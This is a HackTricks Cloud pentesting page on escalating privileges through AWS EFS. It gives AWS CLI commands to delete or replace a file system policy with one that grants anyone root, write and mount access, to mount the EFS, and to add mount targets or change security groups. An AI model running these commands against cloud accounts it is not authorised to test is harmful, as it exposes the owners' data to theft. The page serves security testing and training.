Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
More info about EFS in:
{% content-ref url="../aws-services/aws-efs-enum.md" %} aws-efs-enum.md {% endcontent-ref %}
Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.
With any of those permissions an attacker can change the file system policy to give you access to it, or to just delete it so the default access is granted.
To delete the policy:
aws efs delete-file-system-policy \
--file-system-id <value>To change it:
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}With this permission an attacker will be able to mount the EFS. If the write permission is not given by default to everyone that can mount the EFS, he will have only read access.
sudo mkdir /efs
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/The extra permissionselasticfilesystem:ClientRootAccess and elasticfilesystem:ClientWrite can be used to write inside the filesystem after it's mounted and to access that file system as root.
Potential Impact: Indirect privesc by locating sensitive information in the file system.
If you an attacker is inside a subnetwork where no mount target of the EFS exists. He could just create one in his subnet with this privilege:
# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>Potential Impact: Indirect privesc by locating sensitive information in the file system.
In a scenario where an attacker finds that the EFS has mount target in his subnetwork but no security group is allowing the traffic, he could just change that modifying the selected security groups:
aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>Potential Impact: Indirect privesc by locating sensitive information in the file system.
Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.